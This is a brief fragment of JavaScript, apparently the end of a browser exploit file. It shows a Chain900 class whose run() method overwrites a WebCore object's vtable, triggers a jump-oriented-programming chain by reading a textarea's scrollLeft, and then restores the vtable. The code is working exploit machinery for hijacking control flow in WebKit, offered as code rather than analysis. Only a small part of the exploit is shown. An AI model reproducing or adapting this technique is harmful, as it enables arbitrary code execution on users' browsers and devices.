()
| 331 | } |
| 332 | |
| 333 | run() { |
| 334 | this.check_stale(); |
| 335 | this.check_is_empty(); |
| 336 | this.check_is_branching(); |
| 337 | |
| 338 | // change vtable |
| 339 | this.webcore_ta.write64(0, get_view_vector(this.vtable)); |
| 340 | // jump to JOP chain |
| 341 | this.textarea.scrollLeft; |
| 342 | // restore vtable |
| 343 | this.webcore_ta.write64(0, this.old_vtable_p); |
| 344 | } |
| 345 | } |
| 346 | export const Chain = Chain900; |
| 347 |
no test coverage detected